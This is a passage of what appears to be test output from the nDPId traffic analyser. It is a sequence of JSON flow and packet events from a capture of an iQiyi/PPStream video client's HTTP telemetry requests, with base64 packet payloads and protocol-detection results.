-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
-01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7440000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
-00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
-01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7440000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7440000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196523,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5bd1AADMGzGnKbA7bwKhzCABQxlZz\/QmHa0ch+1AYADbMuQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353196535,"pkt":"ABxCjnAxTF4M6gNlCABFAAC07BRAADMGoWNvzhZNwKhzCABQxlgyP4sgB6+8WFAYAB\/IEQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01967{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1186,"pkt_l4_len":1152,"thread_ts_msec":1467353196740,"pkt":"TF4M6gNlABxCjnAxCABFAASUMuBAAIAGCbjAqHMIb84WTcZZAFAJ9c2nhBlkGlAYAQR8TQAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MTEmY3Q9cGNfX2FkX3BsYXkmYWxidW1faWQ9MTgwOTMyMzAxJmMxPTQ3OTUzMTAwMCZjbHQ9aG9tZWRsJmNuPTE2MDUwNS0lRTYlQUQlQTMlRTclODklODclRUYlQkMlOUElRTklODMlOTElRTYlODElQkElRTYlQUMlQTclRTUlQjclQjQlRTQlQkElOEMlRTYlQUMlQTElRTUlQkQlOTIlRTYlOUQlQTUlRTUlOEYlOEQlRTklODAlODYlRTglQTIlQUQtJUU0JUJCJThBJUU2JTk5JTlBODAlRTUlOTAlOEUlRTglODQlQjElRTUlOEYlQTMlRTclQTclODAmY3B1dXNlPTMyLjgmZGU9MzJlNjU0ZmE1N2JlOTBlYzYzOGM0NmRkZmRkNjY3NTcmZGxsdj1hcHB2JTNENS4wLjAuMTAwMyU3Q29sdiUzRDUuMC4wLjExMDEmZXQ9MCZmdD0yMTc1Jmh0PTAmaHU9LTEma3Y9MTAuMC4wLjI5MyZsYW5nPSZtZW1waHk9NjUmbWVtdmlyPTEyMCZtdD0wJm12PTUuMi4xNS4yMjQwJnAyPTEwMTEmcGU9JnBvcHQ9MCZwdD0wJnB0eXBlPTEmcHU9JnI9NDc5NTMxMDAwJnJfaWQ9NDc5NTMxMDAwJnJhPTEmcm49MjA1MjYmc2Nobl9pZD0yMDAwMDM3MTklMjQlMjQlMjQlMjQxODA5MzIzMDEmc2Nobl9uYW1lPSVFNyVCQiVCQyVFOCU4OSVCQSVFNSVBOCVCMSVFNCVCOSU5MCUyNCUyNCUyNCUyNCVFNCVCQiU4QSVFNiU5OSU5QTgwJUU1JTkwJThFJUU4JTg0JUIxJUU1JThGJUEzJUU3JUE3JTgwJnNwdD0xNDY3MzUzMTk2JnN0YWdlPTImc3RpbWU9MCZ0dmlkPTQ3OTUzMTAwMCZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnVwbG9hZF9pZD0mdXJsPWh0dHAlM0ElMkYlMkZ3d3cuaXFpeWkuY29tJTJGdl8xOXJybHZ1eGxnLmh0bWwmdj0yLjAuMTAyLjMwMTQ3JnZlPTMzMzgyNWNkZjQ4NmNjOTRiNmQyOTU2ZjRkZTZkNGNiJnZpZD0yYjk0NzI5ZTNhOTIwYjIxMTk4ODZjNWM2NzdhZTlkYiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} 
-01736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1459,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196740,"flow_last_seen":1467353196740,"flow_idle_time":7440000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1467353196740,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=11&ct=pc__ad_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=32.8&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&kv=10.0.0.293&lang=&memphy=65&memvir=120&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=0&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=20526&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353196&stage=2&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2